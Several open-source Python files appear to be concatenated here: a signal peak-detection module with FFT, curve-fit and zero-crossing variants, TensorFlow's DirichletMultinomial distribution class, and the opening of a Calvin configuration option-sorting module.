if y_axis[index:index+lookahead].min() > mn:
min_peaks.append([mnpos, mn])
dump.append(False)
#set algorithm to only find maxima now
mn = -np.inf
mx = -np.inf
if index+lookahead >= length:
#end is within lookahead no more peaks can be found
break
#else: #slows shit down this does
# mn = ahead
# mnpos = x_axis[np.where(y_axis[index:index+lookahead]==mn)]
#Remove the false hit on the first value of the y_axis
try:
if dump[0]:
max_peaks.pop(0)
else:
min_peaks.pop(0)
del dump
except IndexError:
#no peaks were found, should the function return empty lists?
pass
return [max_peaks, min_peaks]
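# Usage sketch (illustrative): detect peaks of the module-level test signal
# defined above. The lookahead/delta values are plausible for this signal,
# not tuned.
#
# max_peaks, min_peaks = peakdetect(y, x, lookahead=750, delta=0.3)
# peak_x, peak_y = zip(*max_peaks) # unpack maxima into coordinate lists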
def peakdetect_fft(y_axis, x_axis, pad_len = 5):
"""
Performs a FFT calculation on the data and zero-pads the results to
increase the time domain resolution after performing the inverse fft and
send the data to the 'peakdetect' function for peak
detection.
Omitting the x_axis is forbidden as it would make the resulting x_axis
value silly if it was returned as the index 50.234 or similar.
Will find at least 1 less peak than the 'peakdetect_zero_crossing'
function, but should result in a more precise value of the peak as
resolution has been increased. Some peaks are lost in an attempt to
minimize spectral leakage by calculating the fft between two zero
crossings for n amount of signal periods.
The biggest time eater in this function is the ifft and thereafter it's
the 'peakdetect' function which takes only half the time of the ifft.
Speed improvements could include checking if 2**n points could be used for
fft and ifft, or changing 'peakdetect' to 'peakdetect_zero_crossing',
which is maybe 10 times faster than 'peakdetect'. The pro of 'peakdetect'
is that it results in one less lost peak. It should also be noted that the
time used by the ifft function can change greatly depending on the input.
keyword arguments:
y_axis -- A list containing the signal over which to find peaks
x_axis -- An x-axis whose values correspond to the y_axis list and is used
in the return to specify the position of the peaks.
pad_len -- (optional) By how many times the time resolution should be
increased by, e.g. 1 doubles the resolution. The amount is rounded up
to the nearest 2 ** n amount (default: 5)
return -- two lists [max_peaks, min_peaks] containing the positive and
negative peaks respectively. Each cell of the lists contains a tuple
of: (position, peak_value)
to get the average peak value do: np.mean(max_peaks, 0)[1] on the
results to unpack one of the lists into x, y coordinates do:
x, y = zip(*tab)
"""
# check input data
x_axis, y_axis = _datacheck_peakdetect(x_axis, y_axis)
zero_indices = zero_crossings(y_axis, window = 11)
#select a n amount of periods
last_indice = - 1 - (1 - len(zero_indices) & 1)
# Calculate the fft between the first and last zero crossing
# this method could be ignored if the begining and the end of the signal
# are discardable as any errors induced from not using whole periods
# should mainly manifest in the beginning and the end of the signal, but
# not in the rest of the signal
fft_data = fft(y_axis[zero_indices[0]:zero_indices[last_indice]])
padd = lambda x, c: x[:len(x) // 2] + [0] * c + x[len(x) // 2:]
n = lambda x: int(log(x)/log(2)) + 1
# padds to 2**n amount of samples
fft_padded = padd(list(fft_data), 2 **
n(len(fft_data) * pad_len) - len(fft_data))
# There is amplitude decrease directly proportional to the sample increase
sf = len(fft_padded) / float(len(fft_data))
# There might be a leakage giving the result an imaginary component
# Return only the real component
y_axis_ifft = ifft(fft_padded).real * sf #(pad_len + 1)
x_axis_ifft = np.linspace(
x_axis[zero_indices[0]], x_axis[zero_indices[last_indice]],
len(y_axis_ifft))
# get the peaks to the interpolated waveform
max_peaks, min_peaks = peakdetect(y_axis_ifft, x_axis_ifft, 500,
delta = abs(np.diff(y_axis).max() * 2))
#max_peaks, min_peaks = peakdetect_zero_crossing(y_axis_ifft, x_axis_ifft)
# store one 20th of a period as waveform data
data_len = int(np.diff(zero_indices).mean()) // 10 # floor division: data_len must stay an int for the bit test below
data_len += 1 - data_len & 1
fitted_wave = []
for peaks in [max_peaks, min_peaks]:
peak_fit_tmp = []
index = 0
for peak in peaks:
index = np.where(x_axis_ifft[index:]==peak[0])[0][0] + index
x_fit_lim = x_axis_ifft[index - data_len // 2:
index + data_len // 2 + 1]
y_fit_lim = y_axis_ifft[index - data_len // 2:
index + data_len // 2 + 1]
peak_fit_tmp.append([x_fit_lim, y_fit_lim])
fitted_wave.append(peak_fit_tmp)
#pylab.plot(range(len(fft_data)), fft_data)
#pylab.show()
# Debug plotting disabled: pylab is only imported in the __main__ block
# below, so calling it here would raise a NameError.
#pylab.plot(x_axis, y_axis)
#pylab.plot(x_axis_ifft, y_axis_ifft)
#for max_p in max_peaks:
# pylab.plot(max_p[0], max_p[1], 'xr')
#pylab.show()
return [max_peaks, min_peaks]
def peakdetect_parabole(y_axis, x_axis, points = 9):
"""
Function for detecting local maxima and minima in a signal.
Discovers peaks by fitting the model function: y = k (x - tau) ** 2 + m
to the peaks. The amount of points used in the fitting is set by the
points argument.
Omitting the x_axis is forbidden as it would make the resulting x_axis
value silly if it was returned as index 50.234 or similar.
will find the same amount of peaks as the 'peakdetect_zero_crossing'
function, but might result in a more precise value of the peak.
keyword arguments:
y_axis -- A list containing the signal over which to find peaks
x_axis -- An x-axis whose values correspond to the y_axis list and is used
in the return to specify the position of the peaks.
points -- (optional) How many points around the peak should be used during
curve fitting, must be odd (default: 9)
return -- two lists [max_peaks, min_peaks] containing the positive and
negative peaks respectively. Each cell of the lists contains a list
of: (position, peak_value)
to get the average peak value do: np.mean(max_peaks, 0)[1] on the
results to unpack one of the lists into x, y coordinates do:
x, y = zip(*max_peaks)
"""
# check input data
x_axis, y_axis = _datacheck_peakdetect(x_axis, y_axis)
# make the points argument odd
points += 1 - points % 2
#points += 1 - int(points) & 1 slower when int conversion needed
# get raw peaks
max_raw, min_raw = peakdetect_zero_crossing(y_axis)
# define output variable
max_peaks = []
min_peaks = []
max_ = _peakdetect_parabole_fitter(max_raw, x_axis, y_axis, points)
min_ = _peakdetect_parabole_fitter(min_raw, x_axis, y_axis, points)
max_peaks = [[x[0], x[1]] for x in max_]
max_fitted = [x[-1] for x in max_]
min_peaks = [[x[0], x[1]] for x in min_]
min_fitted = [x[-1] for x in min_]
#pylab.plot(x_axis, y_axis)
#pylab.hold(True)
#for max_p, max_f in zip(max_peaks, max_fitted):
# pylab.plot(max_p[0], max_p[1], 'x')
# pylab.plot(max_f[0], max_f[1], 'o', markersize = 2)
#for min_p, min_f in zip(min_peaks, min_fitted):
# pylab.plot(min_p[0], min_p[1], 'x')
# pylab.plot(min_f[0], min_f[1], 'o', markersize = 2)
#pylab.show()
return [max_peaks, min_peaks]
def peakdetect_sine(y_axis, x_axis, points = 9, lock_frequency = False):
"""
Function for detecting local maxima and minima in a signal.
Discovers peaks by fitting the model function:
y = A * sin(2 * pi * f * x - tau) to the peaks. The amount of points used
in the fitting is set by the points argument.
Omitting the x_axis is forbidden as it would make the resulting x_axis
value silly if it was returned as index 50.234 or similar.
will find the same amount of peaks as the 'peakdetect_zero_crossing'
function, but might result in a more precise value of the peak.
The function might have some problems if the sine wave has a
non-negligible total angle i.e. a k*x component, as this messes with the
internal offset calculation of the peaks, might be fixed by fitting a
k * x + m function to the peaks for offset calculation.
keyword arguments:
y_axis -- A list containing the signal over which to find peaks
x_axis -- An x-axis whose values correspond to the y_axis list and is used
in the return to specify the position of the peaks.
points -- (optional) How many points around the peak should be used during
curve fitting, must be odd (default: 9)
lock_frequency -- (optional) Specifies if the frequency argument of the
model function should be locked to the value calculated from the raw
peaks or if optimization process may tinker with it. (default: False)
return -- two lists [max_peaks, min_peaks] containing the positive and
negative peaks respectively. Each cell of the lists contains a tuple
of: (position, peak_value)
to get the average peak value do: np.mean(max_peaks, 0)[1] on the
results to unpack one of the lists into x, y coordinates do:
x, y = zip(*tab)
"""
# check input data
x_axis, y_axis = _datacheck_peakdetect(x_axis, y_axis)
# make the points argument odd
points += 1 - points % 2
#points += 1 - int(points) & 1 slower when int conversion needed
# get raw peaks
max_raw, min_raw = peakdetect_zero_crossing(y_axis)
# define output variable
max_peaks = []
min_peaks = []
# get global offset
offset = np.mean([np.mean(max_raw, 0)[1], np.mean(min_raw, 0)[1]])
# fitting a k * x + m function to the peaks might be better
#offset_func = lambda x, k, m: k * x + m
# calculate an approximate frequency of the signal
Hz = []
for raw in [max_raw, min_raw]:
if len(raw) > 1:
peak_pos = [x_axis[index] for index in list(zip(*raw))[0]] # list() needed: zip returns an iterator in Python 3
Hz.append(np.mean(np.diff(peak_pos)))
Hz = 1 / np.mean(Hz)
# model function
# if cosine is used then tau could equal the x position of the peak
# if sine were to be used then tau would be the first zero crossing
if lock_frequency:
func = lambda x, A, tau: A * np.sin(2 * pi * Hz * (x - tau) + pi / 2)
else:
func = lambda x, A, Hz, tau: A * np.sin(2 * pi * Hz * (x - tau) +
pi / 2)
#func = lambda x, A, Hz, tau: A * np.cos(2 * pi * Hz * (x - tau))
#get peaks
fitted_peaks = []
for raw_peaks in [max_raw, min_raw]:
peak_data = []
for peak in raw_peaks:
index = peak[0]
x_data = x_axis[index - points // 2: index + points // 2 + 1]
y_data = y_axis[index - points // 2: index + points // 2 + 1]
# get a first approximation of tau (peak position in time)
tau = x_axis[index]
# get a first approximation of peak amplitude
A = peak[1]
# build list of approximations
if lock_frequency:
p0 = (A, tau)
else:
p0 = (A, Hz, tau)
# subtract offset from waveshape
y_data -= offset
popt, pcov = curve_fit(func, x_data, y_data, p0)
# retrieve tau and A i.e x and y value of peak
x = popt[-1]
y = popt[0]
# create a high resolution data set for the fitted waveform
x2 = np.linspace(x_data[0], x_data[-1], points * 10)
y2 = func(x2, *popt)
# add the offset to the results
y += offset
y2 += offset
y_data += offset
peak_data.append([x, y, [x2, y2]])
fitted_peaks.append(peak_data)
# structure date for output
max_peaks = [[x[0], x[1]] for x in fitted_peaks[0]]
max_fitted = [x[-1] for x in fitted_peaks[0]]
min_peaks = [[x[0], x[1]] for x in fitted_peaks[1]]
min_fitted = [x[-1] for x in fitted_peaks[1]]
#pylab.plot(x_axis, y_axis)
#pylab.hold(True)
#for max_p, max_f in zip(max_peaks, max_fitted):
# pylab.plot(max_p[0], max_p[1], 'x')
# pylab.plot(max_f[0], max_f[1], 'o', markersize = 2)
#for min_p, min_f in zip(min_peaks, min_fitted):
# pylab.plot(min_p[0], min_p[1], 'x')
# pylab.plot(min_f[0], min_f[1], 'o', markersize = 2)
#pylab.show()
return [max_peaks, min_peaks]
def peakdetect_sine_locked(y_axis, x_axis, points = 9):
"""
Convenience function for calling the 'peakdetect_sine' function with
the lock_frequency argument as True.
keyword arguments:
y_axis -- A list containg the signal over which to find peaks
x_axis -- A x-axis whose values correspond to the y_axis list and is used
in the return to specify the postion of the peaks.
points -- (optional) How many points around the peak should be used during
curve fitting, must be odd (default: 9)
return -- see 'peakdetect_sine'
"""
return peakdetect_sine(y_axis, x_axis, points, True)
def peakdetect_zero_crossing(y_axis, x_axis = None, window = 11):
"""
Function for detecting local maxima and minima in a signal.
Discovers peaks by dividing the signal into bins and retrieving the
maximum and minimum value of each the even and odd bins respectively.
Division into bins is performed by smoothing the curve and finding the
zero crossings.
Suitable for repeatable signals, where some noise is tolerated. Executes
faster than 'peakdetect', although this function will break if the offset
of the signal is too large. It should also be noted that the first and
last peak will probably not be found, as this function only can find peaks
between the first and last zero crossing.
keyword arguments:
y_axis -- A list containing the signal over which to find peaks
x_axis -- (optional) An x-axis whose values correspond to the y_axis list
and is used in the return to specify the position of the peaks. If
omitted an index of the y_axis is used. (default: None)
window -- the dimension of the smoothing window; should be an odd integer
(default: 11)
return -- two lists [max_peaks, min_peaks] containing the positive and
negative peaks respectively. Each cell of the lists contains a tuple
of: (position, peak_value)
to get the average peak value do: np.mean(max_peaks, 0)[1] on the
results to unpack one of the lists into x, y coordinates do:
x, y = zip(*tab)
"""
# check input data
x_axis, y_axis = _datacheck_peakdetect(x_axis, y_axis)
zero_indices = zero_crossings(y_axis, window = window)
period_lengths = np.diff(zero_indices)
bins_y = [y_axis[index:index + diff] for index, diff in
zip(zero_indices, period_lengths)]
bins_x = [x_axis[index:index + diff] for index, diff in
zip(zero_indices, period_lengths)]
even_bins_y = bins_y[::2]
odd_bins_y = bins_y[1::2]
even_bins_x = bins_x[::2]
odd_bins_x = bins_x[1::2]
hi_peaks_x = []
lo_peaks_x = []
#check if even bin contains maxima
if abs(even_bins_y[0].max()) > abs(even_bins_y[0].min()):
hi_peaks = [bin.max() for bin in even_bins_y]
lo_peaks = [bin.min() for bin in odd_bins_y]
# get x values for peak
for bin_x, bin_y, peak in zip(even_bins_x, even_bins_y, hi_peaks):
hi_peaks_x.append(bin_x[np.where(bin_y==peak)[0][0]])
for bin_x, bin_y, peak in zip(odd_bins_x, odd_bins_y, lo_peaks):
lo_peaks_x.append(bin_x[np.where(bin_y==peak)[0][0]])
else:
hi_peaks = [bin.max() for bin in odd_bins_y]
lo_peaks = [bin.min() for bin in even_bins_y]
# get x values for peak
for bin_x, bin_y, peak in zip(odd_bins_x, odd_bins_y, hi_peaks):
hi_peaks_x.append(bin_x[np.where(bin_y==peak)[0][0]])
for bin_x, bin_y, peak in zip(even_bins_x, even_bins_y, lo_peaks):
lo_peaks_x.append(bin_x[np.where(bin_y==peak)[0][0]])
max_peaks = [[x, y] for x,y in zip(hi_peaks_x, hi_peaks)]
min_peaks = [[x, y] for x,y in zip(lo_peaks_x, lo_peaks)]
return [max_peaks, min_peaks]
def _smooth(x, window_len=11, window='hanning'):
"""
smooth the data using a window of the requested size.
This method is based on the convolution of a scaled window on the signal.
The signal is prepared by introducing reflected copies of the signal
(with the window size) in both ends so that transient parts are minimized
in the beginning and end part of the output signal.
input:
x: the input signal
window_len: the dimension of the smoothing window; should be an odd
integer
window: the type of window from 'flat', 'hanning', 'hamming',
'bartlett', 'blackman'
flat window will produce a moving average smoothing.
output:
the smoothed signal
example:
t = linspace(-2, 2, 41) # third argument is a sample count, not a step
x = sin(t)+randn(len(t))*0.1
y = _smooth(x)
see also:
numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman,
numpy.convolve, scipy.signal.lfilter
TODO: the window parameter could be the window itself if a list instead of
a string
"""
if x.ndim != 1:
raise ValueError("smooth only accepts 1 dimension arrays.")
if x.size < window_len:
raise ValueError("Input vector needs to be bigger than window size.")
if window_len<3:
return x
if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:
raise ValueError("Window is not one of '{0}', '{1}', '{2}', '{3}', '{4}'".format(
*('flat', 'hanning', 'hamming', 'bartlett', 'blackman')))
s = np.r_[x[window_len-1:0:-1], x, x[-1:-window_len:-1]]
#print(len(s))
if window == 'flat': #moving average
w = np.ones(window_len,'d')
else:
w = eval('np.' + window + '(window_len)')
y = np.convolve(w / w.sum(), s, mode = 'valid')
return y
def zero_crossings(y_axis, window = 11):
"""
Algorithm to find zero crossings. Smooths the curve and finds the
zero-crossings by looking for a sign change.
keyword arguments:
y_axis -- A list containing the signal over which to find zero-crossings
window -- the dimension of the smoothing window; should be an odd integer
(default: 11)
return -- the index for each zero-crossing
"""
# smooth the curve
length = len(y_axis)
x_axis = np.asarray(list(range(length)), int)
# discard tail of smoothed signal
y_axis = _smooth(y_axis, window)[:length]
zero_crossings = np.where(np.diff(np.sign(y_axis)))[0]
indices = [x_axis[index] for index in zero_crossings]
# check if zero-crossings are valid
diff = np.diff(indices)
if diff.std() / diff.mean() > 0.2:
print(diff.std() / diff.mean())
print(np.diff(indices))
raise ValueError("False zero-crossings found, indicates problem {0} or {1}".format(
"with smoothing window", "problem with offset"))
# check if any zero crossings were found
if len(zero_crossings) < 1:
raise ValueError("No zero crossings found")
return indices
# used this to test the fft function's sensitivity to spectral leakage
#return indices + np.asarray(30 * np.random.randn(len(indices)), int)
############################Frequency calculation#############################
# diff = np.diff(indices)
# time_p_period = diff.mean()
#
# if diff.std() / time_p_period > 0.1:
# raise ValueError,
# "smoothing window too small, false zero-crossing found"
#
# #return frequency
# return 1.0 / time_p_period
##############################################################################
def _test_zero():
_max, _min = peakdetect_zero_crossing(y,x)
def _test():
_max, _min = peakdetect(y,x, delta=0.30)
def _test_graph():
i = 10000
x = np.linspace(0,3.7*pi,i)
y = (0.3*np.sin(x) + np.sin(1.3 * x) + 0.9 * np.sin(4.2 * x) + 0.06 *
np.random.randn(i))
y *= -1
x = list(range(i))
_max, _min = peakdetect(y,x,750, 0.30)
xm = [p[0] for p in _max]
ym = [p[1] for p in _max]
xn = [p[0] for p in _min]
yn = [p[1] for p in _min]
plot = pylab.plot(x,y)
# pylab.hold() was removed in matplotlib 3.x; repeated plot() calls
# overlay on the same axes by default.
pylab.plot(xm, ym, 'r+')
pylab.plot(xn, yn, 'g+')
# Comparison against the external 'peak_det_bad' module is disabled:
# that module is not shipped with this file and importing it would fail.
#_max, _min = peak_det_bad.peakdetect(y, 0.7, x)
#xm = [p[0] for p in _max]
#ym = [p[1] for p in _max]
#xn = [p[0] for p in _min]
#yn = [p[1] for p in _min]
#pylab.plot(xm, ym, 'y*')
#pylab.plot(xn, yn, 'k*')
pylab.show()
if __name__ == "__main__":
from math import pi
import pylab
i = 10000
x = np.linspace(0,3.7*pi,i)
y = (0.3*np.sin(x) + np.sin(1.3 * x) + 0.9 * np.sin(4.2 * x) + 0.06 *
np.random.randn(i))
y *= -1
_max, _min = peakdetect(y, x, 750, 0.30)
xm = [p[0] for p in _max]
ym = [p[1] for p in _max]
xn = [p[0] for p in _min]
yn = [p[1] for p in _min]
plot = pylab.plot(x, y)
# pylab.hold() was removed in matplotlib 3.x; repeated plot() calls
# overlay on the same axes by default.
pylab.plot(xm, ym, 'r+')
pylab.plot(xn, yn, 'g+')
pylab.show()
| gpl-2.0 |
caisq/tensorflow | tensorflow/python/ops/distributions/dirichlet_multinomial.py | 17 | 13343 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The DirichletMultinomial distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import special_math_ops
from tensorflow.python.ops.distributions import distribution
from tensorflow.python.ops.distributions import util as distribution_util
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"DirichletMultinomial",
]
_dirichlet_multinomial_sample_note = """For each batch of counts,
`value = [n_0, ..., n_{K-1}]`, `P[value]` is the probability that after
sampling `self.total_count` draws from this Dirichlet-Multinomial distribution,
the number of draws falling in class `j` is `n_j`. Since this definition is
[exchangeable](https://en.wikipedia.org/wiki/Exchangeable_random_variables),
different sequences have the same counts, so the probability includes a
combinatorial coefficient.
Note: `value` must be a non-negative tensor with dtype `self.dtype`, have no
fractional components, and such that
`tf.reduce_sum(value, -1) = self.total_count`. Its shape must be broadcastable
with `self.concentration` and `self.total_count`."""
@tf_export("distributions.DirichletMultinomial")
class DirichletMultinomial(distribution.Distribution):
"""Dirichlet-Multinomial compound distribution.
The Dirichlet-Multinomial distribution is parameterized by a (batch of)
length-`K` `concentration` vectors (`K > 1`) and a `total_count` number of
trials, i.e., the number of trials per draw from the DirichletMultinomial. It
is defined over a (batch of) length-`K` vector `counts` such that
`tf.reduce_sum(counts, -1) = total_count`. The Dirichlet-Multinomial is
identically the Beta-Binomial distribution when `K = 2`.
#### Mathematical Details
The Dirichlet-Multinomial is a distribution over `K`-class counts, i.e., a
length-`K` vector of non-negative integer `counts = n = [n_0, ..., n_{K-1}]`.
The probability mass function (pmf) is,
```none
pmf(n; alpha, N) = Beta(alpha + n) / (prod_j n_j!) / Z
Z = Beta(alpha) / N!
```
where:
* `concentration = alpha = [alpha_0, ..., alpha_{K-1}]`, `alpha_j > 0`,
* `total_count = N`, `N` a positive integer,
* `N!` is `N` factorial, and,
* `Beta(x) = prod_j Gamma(x_j) / Gamma(sum_j x_j)` is the
[multivariate beta function](
https://en.wikipedia.org/wiki/Beta_function#Multivariate_beta_function),
and,
* `Gamma` is the [gamma function](
https://en.wikipedia.org/wiki/Gamma_function).
Dirichlet-Multinomial is a [compound distribution](
https://en.wikipedia.org/wiki/Compound_probability_distribution), i.e., its
samples are generated as follows.
1. Choose class probabilities:
`probs = [p_0,...,p_{K-1}] ~ Dir(concentration)`
2. Draw integers:
`counts = [n_0,...,n_{K-1}] ~ Multinomial(total_count, probs)`
The last `concentration` dimension parametrizes a single Dirichlet-Multinomial
distribution. When calling distribution functions (e.g., `dist.prob(counts)`),
`concentration`, `total_count` and `counts` are broadcast to the same shape.
The last dimension of `counts` corresponds to a single Dirichlet-Multinomial
distribution.
Distribution parameters are automatically broadcast in all functions; see
examples for details.
#### Pitfalls
The number of classes, `K`, must not exceed:
- the largest integer representable by `self.dtype`, i.e.,
`2**(mantissa_bits+1)` (IEEE 754),
- the maximum `Tensor` index, i.e., `2**31-1`.
In other words,
```python
K <= min(2**31-1, {
tf.float16: 2**11,
tf.float32: 2**24,
tf.float64: 2**53 }[param.dtype])
```
Note: This condition is validated only when `self.validate_args = True`.
#### Examples
```python
alpha = [1., 2., 3.]
n = 2.
dist = DirichletMultinomial(n, alpha)
```
Creates a 3-class distribution in which the 3rd class is the most likely to
be drawn.
The distribution functions can be evaluated on counts.
```python
# counts same shape as alpha.
counts = [0., 0., 2.]
dist.prob(counts) # Shape []
# alpha will be broadcast to [[1., 2., 3.], [1., 2., 3.]] to match counts.
counts = [[1., 1., 0.], [1., 0., 1.]]
dist.prob(counts) # Shape [2]
# alpha will be broadcast to shape [5, 7, 3] to match counts.
counts = [[...]] # Shape [5, 7, 3]
dist.prob(counts) # Shape [5, 7]
```
Creates a 2-batch of 3-class distributions.
```python
alpha = [[1., 2., 3.], [4., 5., 6.]] # Shape [2, 3]
n = [3., 3.]
dist = DirichletMultinomial(n, alpha)
# counts will be broadcast to [[2., 1., 0.], [2., 1., 0.]] to match alpha.
counts = [2., 1., 0.]
dist.prob(counts) # Shape [2]
```
"""
# TODO(b/27419586) Change docstring for dtype of concentration once int
# allowed.
def __init__(self,
total_count,
concentration,
validate_args=False,
allow_nan_stats=True,
name="DirichletMultinomial"):
"""Initialize a batch of DirichletMultinomial distributions.
Args:
total_count: Non-negative floating point tensor, whose dtype is the same
as `concentration`. The shape is broadcastable to `[N1,..., Nm]` with
`m >= 0`. Defines this as a batch of `N1 x ... x Nm` different
Dirichlet multinomial distributions. Its components should be equal to
integer values.
concentration: Positive floating point tensor, whose dtype is the
same as `n` with shape broadcastable to `[N1,..., Nm, K]` `m >= 0`.
Defines this as a batch of `N1 x ... x Nm` different `K` class Dirichlet
multinomial distributions.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or
more of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
"""
parameters = dict(locals())
with ops.name_scope(name, values=[total_count, concentration]) as name:
# Broadcasting works because:
# * The broadcasting convention is to prepend dimensions of size [1], and
# we use the last dimension for the distribution, whereas
# the batch dimensions are the leading dimensions, which forces the
# distribution dimension to be defined explicitly (i.e. it cannot be
# created automatically by prepending). This forces enough explicitness.
# * All calls involving `counts` eventually require a broadcast between
# `counts` and concentration.
self._total_count = ops.convert_to_tensor(total_count, name="total_count")
if validate_args:
self._total_count = (
distribution_util.embed_check_nonnegative_integer_form(
self._total_count))
self._concentration = self._maybe_assert_valid_concentration(
ops.convert_to_tensor(concentration,
name="concentration"),
validate_args)
self._total_concentration = math_ops.reduce_sum(self._concentration, -1)
super(DirichletMultinomial, self).__init__(
dtype=self._concentration.dtype,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
reparameterization_type=distribution.NOT_REPARAMETERIZED,
parameters=parameters,
graph_parents=[self._total_count,
self._concentration],
name=name)
@property
def total_count(self):
"""Number of trials used to construct a sample."""
return self._total_count
@property
def concentration(self):
"""Concentration parameter; expected prior counts for that coordinate."""
return self._concentration
@property
def total_concentration(self):
"""Sum of last dim of concentration parameter."""
return self._total_concentration
def _batch_shape_tensor(self):
return array_ops.shape(self.total_concentration)
def _batch_shape(self):
return self.total_concentration.get_shape()
def _event_shape_tensor(self):
return array_ops.shape(self.concentration)[-1:]
def _event_shape(self):
# Event shape depends only on concentration, not total_count.
return self.concentration.get_shape().with_rank_at_least(1)[-1:]
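# Sampling sketch: draw (unnormalized) Dirichlet weights via Gamma variates,
# use their logs as multinomial logits (the normalizer cancels), draw
# `total_count` categorical samples, and histogram them with one_hot.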
def _sample_n(self, n, seed=None):
n_draws = math_ops.cast(self.total_count, dtype=dtypes.int32)
k = self.event_shape_tensor()[0]
unnormalized_logits = array_ops.reshape(
math_ops.log(random_ops.random_gamma(
shape=[n],
alpha=self.concentration,
dtype=self.dtype,
seed=seed)),
shape=[-1, k])
draws = random_ops.multinomial(
logits=unnormalized_logits,
num_samples=n_draws,
seed=distribution_util.gen_new_seed(seed, salt="dirichlet_multinomial"))
x = math_ops.reduce_sum(array_ops.one_hot(draws, depth=k), -2)
final_shape = array_ops.concat([[n], self.batch_shape_tensor(), [k]], 0)
x = array_ops.reshape(x, final_shape)
return math_ops.cast(x, self.dtype)
@distribution_util.AppendDocstring(_dirichlet_multinomial_sample_note)
def _log_prob(self, counts):
counts = self._maybe_assert_valid_sample(counts)
ordered_prob = (
special_math_ops.lbeta(self.concentration + counts)
- special_math_ops.lbeta(self.concentration))
return ordered_prob + distribution_util.log_combinations(
self.total_count, counts)
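# A minimal numpy/scipy cross-check of this log-prob (an illustrative
# sketch, not part of the class; assumes scipy is installed):
#
#   import numpy as np
#   from scipy.special import gammaln
#
#   def log_dm_prob(counts, alpha, n):
#       # lbeta over the last axis: sum(lgamma(a_i)) - lgamma(sum(a_i))
#       lbeta = lambda a: gammaln(a).sum(-1) - gammaln(a.sum(-1))
#       log_comb = gammaln(n + 1.) - gammaln(np.asarray(counts) + 1.).sum(-1)
#       return lbeta(alpha + counts) - lbeta(alpha) + log_comb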
@distribution_util.AppendDocstring(_dirichlet_multinomial_sample_note)
def _prob(self, counts):
return math_ops.exp(self._log_prob(counts))
def _mean(self):
return self.total_count * (self.concentration /
self.total_concentration[..., array_ops.newaxis])
@distribution_util.AppendDocstring(
"""The covariance for each batch member is defined as the following:
```none
Var(X_j) = n * alpha_j / alpha_0 * (1 - alpha_j / alpha_0) *
(n + alpha_0) / (1 + alpha_0)
```
where `concentration = alpha` and
`total_concentration = alpha_0 = sum_j alpha_j`.
The covariance between elements in a batch is defined as:
```none
Cov(X_i, X_j) = -n * alpha_i * alpha_j / alpha_0 ** 2 *
(n + alpha_0) / (1 + alpha_0)
```
""")
def _covariance(self):
x = self._variance_scale_term() * self._mean()
return array_ops.matrix_set_diag(
-math_ops.matmul(x[..., array_ops.newaxis],
x[..., array_ops.newaxis, :]), # outer prod
self._variance())
def _variance(self):
scale = self._variance_scale_term()
x = scale * self._mean()
return x * (self.total_count * scale - x)
def _variance_scale_term(self):
"""Helper to `_covariance` and `_variance` which computes a shared scale."""
# We must take care to expand back the last dim whenever we use the
# total_concentration.
c0 = self.total_concentration[..., array_ops.newaxis]
return math_ops.sqrt((1. + c0 / self.total_count) / (1. + c0))
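# Algebra note: with x = scale * mean = scale * n * p_j (p_j = alpha_j / a0),
# x * (n * scale - x) expands to n * p_j * (1 - p_j) * (n + a0) / (1 + a0),
# which matches the Var(X_j) formula quoted in the docstring above.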
def _maybe_assert_valid_concentration(self, concentration, validate_args):
"""Checks the validity of the concentration parameter."""
if not validate_args:
return concentration
concentration = distribution_util.embed_check_categorical_event_shape(
concentration)
return control_flow_ops.with_dependencies([
check_ops.assert_positive(
concentration,
message="Concentration parameter must be positive."),
], concentration)
def _maybe_assert_valid_sample(self, counts):
"""Check counts for proper shape, values, then return tensor version."""
if not self.validate_args:
return counts
counts = distribution_util.embed_check_nonnegative_integer_form(counts)
return control_flow_ops.with_dependencies([
check_ops.assert_equal(
self.total_count, math_ops.reduce_sum(counts, -1),
message="counts last-dimension must sum to `self.total_count`"),
], counts)
| apache-2.0 |
josrolgil/exjobbCalvin | calvin/utilities/confsort.py | 3 | 3435 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Option Parser sorting module.
This module implements a sorting method for options in a
configuration file.
"""
from operator import itemgetter, attrgetter, methodcaller
class Options:
"""
Collection of options.
"""
def __init__(self):
self.options = []
def insert(self, option):
"""
Insert an option into the collection.
"""
self.options.append(option)
def __repr__(self):
return repr(self.options)
def dict(self):
"""
Return unstructured dictionary with key, value of options.
"""
optionsdict = {}
for option in self.options:
optionsdict[option.key] = option.value
return optionsdict
def compare(self, comparable):
if not comparable.getvar():  # Non-variable options pass (getvar returns '')
return 0
for option in self.options:
if comparable.getvar() == option.key:
return 1 # Variables are lower
return 0 # Non resolvable variables can go high
def sort(self):
"""
Sort options based on definition before use.
"""
self.options = sorted(self.options,
key=self.compare)
return self.options
class Option:
"""
Class to store one option in a section of a ConfigParser.
"""
def __init__(self, key, value):
self.key = key.strip()
self.value = value.strip()
